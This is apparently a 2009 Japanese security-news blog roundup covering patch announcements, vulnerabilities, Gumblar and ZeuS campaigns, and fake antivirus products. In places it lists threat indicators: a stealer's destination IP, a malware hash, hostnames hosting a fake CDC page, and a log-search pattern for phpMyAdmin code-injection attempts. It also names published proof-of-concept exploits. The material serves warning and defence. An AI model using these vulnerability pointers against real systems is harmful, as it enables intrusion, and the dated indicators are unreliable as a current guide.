UnderForge of Lack

血清療法の日 (1890年、エミール・ベーリングと北里柴三郎が破傷風とジフテリアの抗体を発見)
聖バルバラの日
E.T.の日 (1982年)
平安京遷都 (794年)

----------
今日も多い・・

----------
Avast!ご乱心
Avast false positives
「avast!」が大量のファイルをウイルスと誤検知する問題が一時発生
「avast! 4 Home Edition」v4.8.1368に、多数のファイルをトロイの木馬“Win32:Delf-MZG[Tri]”として誤検知。問題はウイルス定義ファイルのバージョンが“091203-0”の状態で発生し、最新の“091203-1”へアップデートすることで解決する模様。
Win32:Delf-MZG false positive issue statement

「avast!」乱心
「ﾌﾟｧｰﾝ ﾌﾟｧｰﾝ」の音
これですか？

最新の定義ファイルにすれば問題は解決・・・しませんね（苦笑）
「退治」されてしまったアプリの再インストールが大変のようです。

----------
ごめんなさい
ブラックスクリーン問題を指摘したPrevx、誤りを認めマイクロソフトに謝罪
Microsoft:
ユーザーはどの情報源を信頼するかを決めるべきだ。私としては、最終的な情報源はわれわれのWebサイト以外にないと考えている

今回の騒ぎでPrevxのセキュリティ・ベンダーとしての評判が、決定的に傷つくことはないだろうと、Gartnerの主席セキュリティ・アナリスト、ジョン・ペスカトーレ（John Pescatore）氏は語った。ただし、「こうしたことが度重なると、信用を失うことになる」とのことだ。

素直にあやまっておきましょう・・・

----------
12月の定例パッチ予告
今年最後の（予定の）MS定例パッチ予告が発布されました。
実施日： 12/10深夜 (12/9 11:00AM-PST)
Microsoft Security Bulletin Advance Notification for December 2009
Critical 3 Windows, Office, Windows/IE
Important 3 Windows, Windows, Windows/Office
の合計６つっと

December 2009 Bulletin Release Advance Notification
Microsoft Releases Advance Notification for December Security Bulletin
Patch Tuesday heads-up: MS to fix 'critical' IE, Office security holes
IEの脆弱性ZERO-DAYの修正を含んでくるでしょう。
Exploit published for critical IE 7 zero-day flaw -- 2009.11.23

----------
今度はIllustrator
[IN ZERO DAY]
Potential Adobe Illustrator CS4 issue
Adobe is aware of a report of a potential vulnerability in Adobe Illustrator CS4 CVE-2009-4195).
CVE-2009-4195はまだ受理（予約）されていませんが、PoCが既に出回っていますので出所不明のEPSファイルを開くのは危険です。

Adobe Illustrator Encapsulated Postscript Parsing Vulnerability 4
Do not open files from untrusted sources.
Critical zero-day flaw found in Adobe Illustrator

----------
Flashも
Security Advisory for Adobe Flash Player
Adobe is planning to release an update for Adobe Flash Player 10.0.32.18 and earlier versions, and an update to Adobe AIR 1.5.2 and earlier versions, to resolve critical security issues. Adobe expects to make these updates available on December 8, 2009.

12/8 予定っと

----------
TLDベースの安全性
最も安全な国別ドメインは「日本」、「カメルーン」は3割以上が危険
McAfee, Inc. Reveals the Riskiest Web Domains to Surf and Search
ふ～ん

McAfee Site Advisorの調査にどのくらい重きを置くか？という部分も重要かも？
Gumblarのブロック状況の例 2009/12/1

.lu には例の ROOT SA(AS44042)が鎮座ましますわけですが（笑）
TLDベースで図っても意味薄い気もしないでも無いですが、ひとつの指標にはなるかもしれませんね。

----------
phpMyAdmin
phpMyAdminへの攻撃
少し前からあった攻撃のようですが、ここのところたくさん観測されるようになっています。webサーバーのアクセスログにこのようなログが残っているようでしたら注意しましょう。
直近のログを "phpmyadmin" "p=phpinfo()" あたりで GREP取ってみますかね。
対策

最新版：phpMyAdmin 3.2.2.1 or 2.11.9.6.
PMASA-2009-6 -- 2009.10.13
使用されているかもしれない脆弱性：
phpMyAdmin Setup Script PHP Code Injection Vulnerability 2
phpMyAdmin Script Insertion and SQL Injection Vulnerabilities 2

----------
炉
Malware Blacklist 12/1 update:
Donate whatever you can

----------
Google DNS
Introducing Google Public DNS
Google Public DNS
なんでもかんでもGoogleに頼ってしまいそうな自分が怖い（笑）

続く
----------
Google IME
グーグルが「Google 日本語入力」ベータ版を公開、クラウド武器に辞書を強化
日本語入力まで！（笑）
思いどおりの日本語入力 - Google 日本語入力
Google 日本語入力

「Google 日本語入力」はATOKやMS-IMEを超えることはできるのか、実際に使って実用に堪えるかどうか試してみた
何か、調査の方向性がかなりアレゲですが・・・

更に続く
----------
Google Web Speed
How fast is your site?
Page Speed
ページの読み込み速度も、SEOの要素になったりするんでしょうか・・・

こうしてますます帝國から離れられなく・・・

----------
微妙に時間切れ気味・・・

詳しく読んでない記事群：

UK Authorities Give Boot to Counterfeiters
英警察が偽ブランド販売サイトをシャットダウン。カード情報の窃取にも使われていた・・っと
（ScanSafeのカラーが変わっています・Cisco色？）

警視庁、「ネットカフェ」利用者の本人確認義務化などに一般から意見募集

Security Wars: 3.2. 社会からの回答の試み
びみょな連載になってきた・・

ネット詐欺師の儲け方［前編］
執筆・編集協力：McAfee

コンピュータウイルス・不正アクセスの届出状況[11月分]について
「 インターネットは自己責任！！『はい』をクリックしたのはあなたです。 」
この標語って誰がつくってるんだろう・・

Version 4.2 of vulnerability scanner Nessus released
Nessus 4.2 Released!

Free database firewall protects PostgreSQL and MySQL
GreenSQL
GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc). GreenSQL provides MySQL database security solution. GreenSQL is distributed under the GPL license.
ちょっと試してみたい・・

----------
私信：Terra様
昨日のInstall Maniaxは「IIS上」ってことで、私は断念してますよ（苦笑）

----------
| 1259870433 | B | [goog-black-hash 1.45793 update]
| 1259870402 | M | [goog-malware-hash 1.17641 update]
| 362040 | -3838(365878)
| 1080071 |
EoF

今日は 1 2 3
国際障害者デー
カレンダーの日
奇術の日
妻の日 (1年間の妻の労をねぎらう日)
白いハト記念日 (子羊の群れキリスト教会)
個人タクシーの日
自動車電話の日，コードレス電話の日
※自動車電話はサービス自体を2011年度いっぱいで終わらせることが発表されている。
プレイステーションの日 (1994年発売)
ひっつみの日

----------
B(lack)SoD 続報
ブラックスクリーン問題とWindows Update
今回のような報告が、誤って出てしまったことは残念ですが、被害を受ける前に上記の点は、繰り返しになりますが強く推奨させていただきます。
ご・・・ごめんなさい

Microsoft Black Screen of Death - Fact of Fiction?
I can see how this might be an easy mistake to make, especially if you are researching several issues on one machine or VM image.
複数の実マシンで実行して、VM環境下でのテストは信用するな・・ってことですね

マイクロソフト、ブラックスクリーン問題と更新プログラムの関連性を否定
Microsoftのサポート・フォーラムで、「ブラックスクリーン」に関するスレッドは1つしかない。11月30日以降、同フォーラムへは数名のユーザーが、この現象を報告している程度だった。
「Windowsブラックスクリーン問題はパッチと無関係」、MSが結果公表

Win7の件は謎のまま終焉・・かな？

----------
インフルエンザ・キャンペーン
[らんちょんみ～と]
US/CERTからの警報：
H1N1 Malware Campaign Circulating
Users who click on this link may become infected with malware.
ZeuS/zbot？ - H1N1インフルエンザワクチン接種
H1N1 Vaccination Profile – A path to infection
Fake H1N1 (Swine Flu) alerts lead to malware
SPAM and Malware taking advantage of H1N1 concerns

vacc_profile.exe -- 12/01 18-UTC 7/41(17.07%)
vacc_profile.exe -- 12/02 02-UTC 12/41(30.00%)
徐々に検出が上昇していますが、それでもイマイチですね。

日本語で同じような新型インフルエンザワクチン接種方針みたいなスパムが届いたらひどいことになるでしょうね。
恐ろしい仮定ですが、いつこうならないとも限りません。

cdc.govの偽サイト -- Dec02
p930c44.tokyte00.ap.so-net.ne.jp
122x218x93x174.ap122.ftth.ucom.ne.jp
i125-202-254-181.s04.a001.ap.plala.or.jp
gd202157051053.u6a.kcn-tv.ne.jp
上記はMDLにも補足されています。

----------
週間脆弱性 by HIRT
チェックしておきたいぜい弱性情報＜2009.12.02＞ BGM

• Windows 7/Windows Server 2008 R2のSMBのぜい弱性（2009/11/14）
• SSL/TLSプロトコルのぜい弱性（2009/11/04）
• OpenSSL 0.9.8lリリース（2009/11/11）

今回は技術情報、PoC検証、適用後の問題点指摘などかなり重要なものが入っています。

----------
SOHANAD
SOHANAD’s Secret Revealed
環太平洋地域（特に東南アジア～インド）で流行していたとされる SOHAMAファミリの解析

Worm/Sohanad.bm - Worm

インスタントメッセンジャー経由か、AutoRunでの自己増殖Wormですかネ？

----------
Bind9 thru DNSSEC
BIND 9 の DNSSEC 検証処理における脆弱性
DNSSEC を有効にしている BIND 9 において、再帰的なクライアントクエリを処理する際に脆弱性が存在します。
11/25の報告が正式にアドバイザリになりました。
BIND 9の脆弱性を利用したキャッシュポイズニング攻撃について

Solution;
ISC (9.4.3-P4、9.5.2-P1、9.6.1-P2)

----------
FakeAV List
Fake Security Software All Up
いっぱいありますね・・・

啓蒙のために：
偽セキュリティソフトにだまされない5＋1の方法

----------
Worst TLD?
Cameroon leapfrogs Hong Kong in malware hosting blocklist
The top five riskiest country domains online for 2009, according to McAfee

1. Cameroon (.cm)
2. PR of China (.cn)
3. Samoa (.ws)
4. Phillipines (.ph)
5. Former Soviet Union (.su)

このへんのドメインをみたら疑ってかかりましょう・・
って、.cn ヒトククリでいいんですかネ？

----------
あなぼこ

SweetRice File Inclusion Vulnerabilities 4
[IN ZERO DAY] The vendor recommends to set register_globals to "Off".
Official:SweetRice is a most simple program for website management.

Photobox Uploader ActiveX Control Buffer Overflow Vulnerability 4
[IN ZERO DAY] set kill-bit
Product link : N/A (Vender: lateral Arts)

Lateral Arts Uploader ActiveX Control Buffer Overflow Vulnerability 4
update : 1.3 (No Details)

Roxio Creator Image Rendering Integer Overflow Vulnerability 4
update : Creator 2010 Service Pack 1

Joomla Joaktree Component "treeId" SQL Injection Vulnerability 3
[IN ZERO DAY] Edit the source code to ensure that input is properly sanitised.

----------
Update Tools
[Sysinternals]
Updates: VMMap v2.5, Disk2vhd v1.4; Sigcheck v1.63; Autoruns v9.57; PsExec v1.97; PsKill v1.13 and a new Mark's Windows Internals Session video from PDC 2009

----------
Thunderbird
Thunderbird 3 RC2がリリース -- mozilla flux

[fixed RC2 build 1]
４個の修正ですが、セキュリティではない模様

Critical bug fixed in Thunderbird
It had caused the previous version to hang on shutdown, consume too much memory, and close all IMAP connections.
まさに昨日、この状況に直面しました・・（汗

----------
英語文章shellcode?

English Shell Code Could Make Security Harder
English Shellcode
えーっと・・英文にさまざまな文字コードをちりばめて shellcodeを形成し、Wikipediaなどに埋め込む・・と？

FUDですか！？

そんな事態になったときに考えることにします・・・
Stick and Stones may Break my Bones but Words will Pass Through me Undetected?
Remember that the processor most likely to be exploited by words is not the desktop CPU but the human brain. Don’t let the scaremongers frighten you!

----------
いんと～る
※もしかして: インストール

インストールマニアックス3開催、今回はアジア決戦！

インストールマニアックス3 Hyper-V祭り

腕に自信のある方はぜひ～

----------
| 1259784047 | B | [goog-black-hash 1.45721 update]
| 1259784003 | M | [goog-malware-hash 1.17617 update]
| 365878 | -2438(368316)
| 1077122 |
EoF

原子炉の日 (CP-1, シカゴ大学はバラク・オバマの母校)
日本人宇宙飛行記念日 (1990年、秋山豊寛記者がソユーズ・TM11にて宇宙へ。費用は約1400万ドル)
奴隷制度廃止国際デー (International Day for the Abolition of Slavery)
安全カミソリの日
建国記念日・ラオス
連邦結成記念日(アラブ首長国連邦)

----------
FreeBSD
FreeBSDに、簡単にroot権限で任意コード実行可能な脆弱性が発覚、緊急パッチが公開されています。
[FreeBSD-Announce] Upcoming FreeBSD Security Advisory
rtld.c

影響下にあるプロダクツ：
FreeBSD 7.0 7.1 7.2
FreeBSD 8.0

FreeBSD 'execl()' Local Privilege Escalation Vulnerability
FreeBSD Dynamic Linker Privilege Escalation Vulnerability
Secunia指標は2(Less Critical)

PoC
** FreeBSD local r00t zeroday
FreeBSD LD_PRELOAD Security Bypass -- xorl %eax, %eax

Secunia指標が低いのが気になりますが、とりあえずパッチ適用のための準備をしましょう。

----------
SSL/VPN
複数の SSL VPN (Web VPN) 製品においてウェブブラウザのセキュリティが迂回される問題
SSL VPN (Web VPN) を通じて細工したウェブページをアクセスすることにより、ウェブブラウザのセキュリティメカニズム (Same Origin Policy) を迂回される可能性があります。
Clientless SSL VPN products break web browser domain-based security models

また、シス管にはづつう（変換不能）の種になりそうな問題が・・
US/CERTのリストには Unknownのリストが並んでいます。

Because all content runs at the privilege level of the web VPN domain, mechanisms to provide domain-based content restrictions, such as Internet Explorer security zones and the Firefox add-on NoScript, may be bypassed.
NoScriptも、こうなるとバイパスされてしまいますね・・・・

SSL VPN (Web VPN) の管理者は以下のワークアラウンドを適用することで、本問題の影響を軽減することができます。

• URL の書き換えを信頼できるドメインに限定する
• VPN サーバの接続先を信頼できるドメインに限定する
• URL 隠ぺい (URL hiding) 機能を無効にする

Clientless SSL VPN products break web browser domain-based security models

----------
B(lack)SoD
マイクロソフト、Windowsのブラックスクリーン問題を調査中と発表
米国Microsoftは11月30日、11月のセキュリティ・アップデートが原因で一部のWindowsマシンの画面が真っ黒なる問題について、調査を行っていると発表した。
windows 7 black screen after login, no desktop show up
If the issue persists, please perform the steps below to add explorer.exe process.

• Press Ctrl+Shift+Esc on the keyboard to bring up Task Manager.
• Click File -> New Task (Run…)
• Type explorer.exe and then press Enter.

対策は 12/8(Black Tuesday-December)には間にあうかな？
Microsoft says B(lack)SODs not linked to latest patches
少なくとも、先月の段階で気がついていたようで・・・

Microsoft Investigates Windows 7 "Black Screen of Death"
forgot to turn monitor on.
いや・・さすがにソレハナイ・・

----------
PDF via BlackBerry
Research In Motion Releases Advisory for BlackBerry PDF Distiller Vulnerabilities
Beware of rigged PDF files on BlackBerry
attacker could exploit the issues by simply e-mailing a booby-trapped PDF file to a BlackBerry user.

日本のユーザにも警告が出ているんでしょうか？

----------
biy.ly VS spammer
短縮URLサービスを展開するbit.ly、新たに3サービスと連携してスパマーに対応
スパムおよびマルウェアと戦うために、3つのサービスと連携することを発表した。その3つとは、ベリサインのiDefense、websenseのThreatseeker Cloud、およびSophosだ。

WebSense(ThreatSeeker)のプレスリリース
Bit.ly Leverages Websense to Analyze Millions of Web Sites and Content Daily to Protect Users From Spam, Phishing and Malware
Graham Cluley BLOG:
Sophos and bit.ly - making short links safer

コレも忘れないであげてください・・
LongURL

----------
あなぼこ

TYPO3 DB Integration Extension Command Execution Vulnerability 4
Update to 1.3.2 or later

ActivePerl Compress Modules Off-by-One Vulnerabilities 3
Update to ActivePerl 5.10.1 build 1006.

IBM WebSphere Portal Unspecified Security Issue and Cross-Site Scripting 3
Update to version 6.1.0.3.

----------
らんちょんみ～と

spamとWeb Threatとphisingがごった煮になってる感もありますが、最近は単純なspam mailだけで終了しないものでしょうがないのかも・・

Zeus Trojan Catches Swine Flu
Minipost: CDC Version of Zeus? -- GarWarner
Zeusのインフルエンザ･キャンペーン
CDC:アメリカ疾病予防管理センター

Google Jobs Scam: Read the Fine Print -- GarWarner
"Google Jobs" 詐欺誘導
Twitter Spam
Spaces.live.com 詐欺誘導
blogspot(blogger) 詐欺誘導
"You can work from home"

Koobface Kicking off the Festive Season

Phishing targeting Google AdWords

----------
P2P:Share abused
Share違法配信を一斉摘発、10都道府県で11人逮捕へ
容疑者間に横のつながりはないが、個別に摘発すると証拠隠滅のおそれがあるため、都道府県警察が連携しての一斉逮捕となった。

学校や会社でやってる「猛者」もいるっぽいですしね・・

----------
IE6 hasnot been buried yet.
Microsoft actively urges IE 6 users to upgrade
Microsoft has begun a campaign to actively urge users of its 8-year-old Internet Explorer 6 browser to upgrade.
いいかげん、そろそろ IE6の亡霊をなんとかしてください・・・

IE8のSmartScreenがFaceBookのとある危険コンテンツをブロックしている様子：
IE8 SmartScreen in action

IE8が優れているかどうかはともかくとして、間違いなくIE6によるWebAccessは危険です。

----------
Block Status

Gumblarのブロック状況の例 2009/12/1
実際はリストはどんどん肥大化していっていると思いますが、とりあえず11/16とまったく同じリストがどう判定されるかのチェック。
すごい手間がかかってます（脱帽）
Googleのブロックリストは恐ろしい勢いで ADD/REMOVE されますので、実際にインジェクションが継続中なのかどうかを見ないと何ともいえませんが、Googleが除外した後、再インジェクションされている例もありますので、あまり過信しないほうがいいかもしれません。

Gumblar関連の秀逸なGlossaryが noooo_spam様によって公開されていますので併せて参照してみてください。
Gumblar（GENOウイルス）再来襲。いろいろＱ＆Ａ集。

WebMaster用のGlossaryでもつくろうかな（時間があったら・・・）

----------
だまされないぞ！
偽セキュリティソフトにだまされない5＋1の方法
実にいい啓蒙記事ですね。
もっとも、fakeAVに限ったことではありませんが・・・(FakeCodecなど）

----------
91.213.94.131
ちょっと気になったので注意喚起

91.213.94.10:AS47821(BOGONET) このIP発のトロイが大量に MDL/MalwareURLに登録されていますが、この中に "sdfg.jar"という Javaを使ったExploitsが報告されています。

PE:
e6f303cc05d0edf59831863e956a03be 3/41(7.32%)
Trojan.Win32.Vilsel.nzu
Stealer送信先: 91.213.94.131

----------
IT?

IT(ソレ）でしょう！？

「IT」と全てをひっくるめ過ぎ？

----------
| 1259697651 | B | [goog-black-hash 1.45655 update]
| 1259697625 | M | [goog-malware-hash 1.17596 update]
| 368316 | +1976(366340)
| 1073194 |
EoF

将棋の日
蓮根の日
肺がん撲滅デー
島原防災の日 1990年（平成2年）11月17日に噴火 1991年6月3日

----------
素直結の人って多いんですか

SMB の脆弱性により、サービス拒否が起こる
の件でいろいろ警報が出ていますが・・・

最新OSに影響するDoSの脆弱性、Microsoftが確認
Windows 7とServer 2008 R2に新たな脆弱性、攻撃プログラムが出現
Windows 7にゼロデイ脆弱性が発覚
「ポートをブロックすれば問題ない」とマイクロソフト
Port 137-139/445 を素通しのルータは少ないと思うんですが・・結構あったりするんですかネ？
Microsoft confirms 'detailed' Windows 7 exploit

Microsoft Releases Security Advisory 977544
※この件とは関係ないですが、米国の国内外への航空機フライトへのセキュリティ警戒レベルが[ELEVETED]になっています。
Current Threat Level

----------
KILL THE BOT

Checking In With The Ozdok Sinkhole
Bot撲滅活動を積極的に行っているFireEyeですが、先日のOzdok(Mega-D)掃討の際にC&CのIPを乗っ取り、そこに接続してくるIPを計測した結果・・・
After about 5 days we saw 487,430 unique IP addresses connecting to us.
何かちょっと想像できないですが、恐ろしい範囲で感染が拡大していた様子がわかります。

ZeuS、Koobface、Gumblarも似たような状況なんでしょうか？
※複合感染している「多重ゾンビ」も多いようですが・・・

----------
Nagiosの脆弱性攻撃が表面化

ネットワーク監視ツールのNagiosに脆弱性が指摘されたのは 2009年7月の話ですが
【7】Nagios にコマンドインジェクションの脆弱性
Nagios の statuswml.cgi の脆弱性(CVE-2009-2288)に関する検証レポート

Nagiosのstatuswml.cgiの脆弱性（CVE-2009-2288）をつく攻撃

UAがなぜか、サーバ管理ツールのPleskらしいのですが、どっかのVPSが陥落でもしてるんでしょうか？

----------
だから64bitにしてね

What's Another 32-bits to Malware?
As reported in the Security Intelligence Report, 64-bit Windows has some of the lowest reported malware infection rates in the first half of 2009:

まぁ、新しいPC/OSを買うときは64bitが視野に入るのは当然ですけど・・・
※でも結構動かないソフトが多いのも事実です

----------
SSLv3/TLSの問題

Reports of a successful exploit of the SSL Renegotiation Vulnerability?

Researcher busts into Twitter via SSL reneg hole
Researcher busts into Twitter via SSL reneg hole
Password theft via vulnerability in SSL/TLS protocol

攻撃が成功すれば Twitter-APIを使ったトリックによってPasswordが盗まれかねないというもの・・
中間者攻撃なんか、都市伝説かと思っていましたが・・・

----------
Gumblarはまだまだ続く・・・

対策さえ怠らなければぜんぜん怖くない（はず）Gumblarですが・・
ファッションブランドで有名な Kaepa の公式（日本サイトのみ）も陥落している様子・・・

Gumblar再来襲。発動するウイルスを1週間に渡って収集してみた。-- 無題なブログ
新しい検体ほど対応数が少ないという感じ。ウイルス本体はほとんど毎日差し替えられてます。
相変わらず、Malware-Crafterはマメに働いていらっしゃるようで・・

[続報] Gumblar に酷似、新たな脅威発生に警告
10 月 14 日にこのマルウェアを検知してから、11 月 16 日現在まででカスペルスキーでは既に国内の 1250 以上の感染サイトを確認しており、先月 22 日当該脅威の発表時点より 20 倍以上の感染となっています。動画サイトやゴルフ関連サイト、神社や空港に至るさまざまな日本のサイトにおいて感染が確認されており、十分な警戒が必要です。
1250サイト以上が改ざん被害に、カスペルスキーが再度警告

Malware, but only for a second in a day
Brute-forcing aside, the only real way to tackle this problem is to use “Just in time” detection (otherwise known as on-access), failing that, NoScript remains your best protection.
結局自分を守れるのは自分自身の日頃の防御姿勢ということになるのでしょう。

----------
いじめ via Facebook

Facebook isn't always fun
国際いじめ撲滅週間(National Anti-Bullying Week)にあたり、Kasperskyが FacebookのようなSNSを挙げて、子供にとって必ずしもよい環境ではないと警鐘。

日本だと最近あまり聞かなくなった「学校裏サイト」がそれに当たるのでしょうか？

----------
spam送信主？

Katya, My Queen-To-Be

最近だとむしろイケメン（笑）のほうが引っかかる率が高いんじゃないかな？（苦笑）

----------
会津若松を見習ったほうが・・

自治体の違法コピー相次ぐ～道庁でも4700本の違法判明、1億4000万円で和解
北海道庁、違法コピーでマイクロソフトにライセンス料金 1 億 4 千万円を支払う

これって事業仕分けの対象？（笑）
NHKローカルニュースで「１億3700万を補正予算で計上」

----------
バルマー怒りの一撃

Xbox 改造ユーザに Xbox Live 利用停止の措置
Xbox Live の利用を禁じられたのは、海賊版ゲームを実行するためのチップやソフトウエアをインストールするなどしていたユーザ 60 万人。Xbox Live から締め出されたユーザはログイン時に「お使いのゲーム機は利用停止となりました」とのメッセージが表示されるとのこと。規制されるのは Xbox Live のアカウント利用のみであり、他への影響はないそうだ。

60万人ってすごいな～

----------
Psystar Lose

アップル、MacクローンのPsystarに勝訴
Apple wins copyright infringement case against Psystar in California

まぁ・・順当な勝訴ですね。
今後更に損害賠償交渉に入るのでしょう。

----------
GSB:
| 1258401606 | B | [goog-black-hash 1.44575 update]
| 1258401602 | M | [goog-malware-hash 1.17236 update]
| 365722 |
| 988252 |
EoF

---------------------------
申し訳ありません。
atwordサーバがまた落ちていたようです

そろそろ、移転したいんですがね・・
---------------------------

えーっと
1111なので異常に多いんですが・・・

11月11日 -- 記念日・年中行事
を参照してください（笑）
復員軍人の日(Veterans Day)、第一次世界大戦の終結記念日（停戦協定に調印）を記念したものです。

----------
暗黒の火曜日(UTC) in November

さて・・いつもどおり（セキュリティポリシーによっては）管理者が涙を流す日がやってまいりました（笑）

2009 年 11 月のセキュリティ情報
なんか・・フォントがちょっと変だ(6:50AM/JST現在、CSSが抜けてる・笑）

事前予告どおり、６個のアドバイザリが公開されています。

緊急	MS09-063	Microsoft Windows	Web Services on Devices API の脆弱性により、リモートでコードが実行される (973565)
緊急	MS09-064	Microsoft Windows	ライセンス ログ サーバーの脆弱性により、リモートでコードが実行される (974783)
緊急	MS09-065	Microsoft Windows	Windows カーネル モード ドライバーの脆弱性により、リモートでコードが実行される (969947)
重要	MS09-066	Microsoft Windows	Active Directory の脆弱性により、サービス拒否が起こる (973309)
重要	MS09-067	Microsoft Word	Microsoft Office Excel の脆弱性により、リモートでコードが実行される (972652)
重要	MS09-068	Microsoft Excel	Microsoft Office Word の脆弱性により、リモートでコードが実行される (976307)

2009年11月11日のセキュリティ情報
小野寺です
更新された過去のセキュリティ情報
MS09-045 (JScript)
MS09-051 (Media Runtime)

November 2009 Security Bulletin Release
おなじみ、危険性指標グラフ(拡大)です。

MS09-063の補足説明
Vulnerability in Web Services on Devices (WSD) API
MS09-064の補足説明
Details on the License Logging Service vulnerability
MS09-065の補足説明
Font Directory Entry Parsing Vulnerability In win32k.sysI

Secunia指標：
MS09-063:Windows Web Services on Devices API Memory Corruption Vulnerability Moderately Critical:3
MS09-064:Microsoft Windows License Logging Server Buffer Overflow Moderately Critical:3
MS09-065:Microsoft Windows Win32k Kernel-Mode Driver Multiple Vulnerabilities Highly Critical:4
MS09-066:Microsoft Windows Active Directory Denial of Service Less Critical:2
MS09-067:Microsoft Excel Multiple Vulnerabilities Highly Critical:4
MS09-068:Microsoft Office Word File Information Memory Corruption Vulnerability Highly Critical:4

Microsoft Releases November Security Bulletin
Microsoft November Black Tuesday Overview
Microsoft Patch Tuesday - November 2009

AM3:00に自動設定にしている方は（いつもどおり）手動でアップデートを行ってください。

----------
Snow Leopardも

セキュリティアップデート 2009-006 / Mac OS X v10.6.2 について
58個の脆弱性修正！

Apple Releases Mac OS X v10.6.2 and Security Update 2009-006
Snow Leopardの更新版リリース、40項目以上の脆弱性に対処
Mac OS Xに巨大パッチ公開--58件の脆弱性が修正される
Apple Security Update 2009-006 for Mac OS X v10.6.2
あまりにも数多すぎるためか、Secuniaも１個で対処（笑）
Apple Mac OS X Security Update Fixes Multiple Vulnerabilities Highly Critical:4

また、JavaJREのバージョンがあがったことを受け、MacOS X 10.5.8のセパレートアップデートもリリースされています。
セキュリティアップデート 2009-006 (Client)

----------
脆弱性が最も多かったのは Firefox

脆弱性が最多のブラウザはFirefox――Cenzic報告書
脆弱性が最多のブラウザはFirefox――Cenzic報告書
2009年前半のWebセキュリティ，最も脆弱性が多かったWebブラウザは「Firefox」

確かにFirefoxの脆弱性報告数は多いですね。特に 3.5.13.5.0のときの gitJITエンジン攻撃はかなりインパクトがありました（実際にゼロデイ発生になりましたし）
IEとかは脆弱性が放置されてるだけのような気もしますが（笑）
そもそもIE6が残っている時点で、セキュリティを語ってもしょうがないんですけどね

Firefox Now Top Browser - for ’vulnerabilities’
I know I shouldn't be laughing, but after all the fanboys going wild with digs at IE etc users, about how "oh so more secure" Firefox is, I just can't help myself. I said this would happen, as did many others, and the fanboys were unable and are still unable, to provide a reasonable defense as to why we were wrong, instead preferring to go into childish playground arguments (ever found a fanboy that *could* debate reasonably? I haven't).
まぁ、何事も「Zealots - 狂信者」になっちゃいけないという警句なのかもしれません。

----------
この脆弱性～何の脆弱性～？

チェックしておきたいぜい弱性情報＜2009.11.10＞ by HIRT
Firefox 3.5.4(3.0.15)アップデート
※Unicodeの制御文字 RTLの解説
aria2にフォーマット文字列に関するぜい弱性（2009/10/20）
Rational AppScan Enterprise Editionにクロスサイト・スクリプティンのぜい弱性（2009/10/22）

----------
偽マカフィー

MaCatte（笑）
Rogue Security Product Copies McAfee’s Look and Feel

Norton先生にも"Nortel"(注：破産したNortelとは無関係)ってのがありましたね
Nort “what” AV?

----------
Offensive Security HACK'ED

hxxp://www.offensive-security.com/blog/backtrack/offsec-web-server-hacked/ -- Offsec Web Server Hacked
ウォッチリストには入ってるけど、あまり紹介したことの無い Offensive Securityですが、大規模なDDoS攻撃を受けていた最中にWebサーバの一部がハッキングを受け wikiベースのページが改ざんされていた模様です。
陥落期間は11/6(CST)から28時間ほどの間。その間に"Metasploit Unleashed Wiki"を訪れたことのある方は念のためチェックを（具体的な陥落内容は不明です）

危なくて JavaScript ON に出来ないなぁ・・

----------
Microsoft FakeAV Collection

おなじみ、MSRTブロックリストに追加された偽セキュソフトです。
Rogues FakeVimes and PrivacyCenter added to MSRT

なんというか・・・Windowsのセキュリティ系っぽいアイコンをふんだんに使ってますね（笑）
Windows System Defender
Windows Enterprise Suite
Privacy Center
Privacy Components
Safety Center

----------
マルウェア作者も格闘技ファン？

格闘技ファンの方、お気をつけください
Fedor Fans Beware
エメリヤーエンコ・ヒョードル(Fedor Emelianenko)選手が所属するジムのホームページが陥落 (Gumblar'ed)していた模様。

また、11/14に行われるマニー・パッキャオ vs ミゲール・コットのボクシングの試合を検索すると・・？
Pacquiao vs. Cotto
はい、FakeAVへの誘導です。

ファンというか、節操が無いだけなのかもしれませんが・・

----------
で、そのGumblarは

Gumblar小休止？
11/4以降11/7までは、一次攻撃サイトにインジェクションされているURLは、だいたい一日に一回の周期であたらしいURLに書き換わっていたのですが、それ以後は新しいURLには書き換わっていないようです。小休止三日目？

憶測で動くのは危険ですが、とりあえず攻撃（インジェクションコード更新）は一段楽している模様です。

----------
1バルマー≒1.49日本円

XBOXアカウントのフィッシングは何故好まれるのか？
理由は、XBOX Liveアカウントを売ると、現実世界のキャッシュが手に入るからだ：

ゲームスコアの高いアカウントでないと売れないンでは？

----------
セキュ懸念の尽きないTwitter

狙われるTwitter：スパム・ボットが「つぶやき」を自動送信

ぜんぜん使ってないTwitterですが、誰か使い方を教えてください（笑）

現在のKoobfaceはFacebookを狙い撃ち中？
New Koobface Component Imitates Facebook User

----------
WSJ vs Google

「メディア王」マードック氏、ニュース記事をGoogle Newsに不掲載にする意向を表明
ウォールストリートジャーナルがGoogleを拒絶したらWSJ.comはトラフィックの３割近くを失うことになるが…

何でもかんでも無料ってのは確かによくない傾向ですが、課金のためのシステム・インフラが安定しない限りこの問題は付きまとうでしょうね。

いずれにせよ WSJ と AFP からの記事の抜粋は避けよう（笑）

----------
Google Safe Browsing STATUS:
| 1257883248 | B | [goog-black-hash 1.44143 update]
| 1257883201 | M | [goog-malware-hash 1.17092 update]
| 340581 | 現在ブロックされているドメイン
| 937525 | 現在までにログに取られたドメイン

EoF

ホームビデオ記念日(ビデオ戦争)
おしぼりの日 (全国おしぼり協同組合連合会)
とらふぐの日

----------
don't update firefox (with Norton)

またやらかしてくれたようで・・
NIS2010のアップデートでアドオンが使用できなくなる問題が発生 -- Mozilla Flux
アドオンマネージャから個別のアドオンの設定画面を呼び出そうとすると処理が停止してしまうほか、アドオンを更新しても、再起動を促すメッセージは表示されるものの、通知バーが出ないのが特徴だ。とくに前者は、Firefox本体を終了してもウィンドウが残ってしまい、タスクマネージャでプロセスを消すことを余儀なくされる。不便なことおびただしい。

会社のPCに入れる前に気がついてよかった・・・
かといって脆弱性の残っていることが判っているバージョンを使い続けるわけにもいかず・・・セキュソフトの都合で脆弱性バージョンを使うってセキュソフトの存在意義が問われそうですね（苦笑）

Re: Norton Toolbar disappears after applying 17.1.0.14 patch
We don't have a firm ETA on the fix right now.
NO ETA™
あと、こんなのも起きてる様子・・・
Unable to launch Microsoft Outlook after applying 17.1.0.14 patch
but I cannot get Outlook to open at all. I get a message "Cannot start Microsoft Outlook. Cannot open the Outlook window." I do a lot of my small business work by e-mail, so this is fairly serious.

会社のNorton信奉もそろそろ何とかしたい・・・

----------
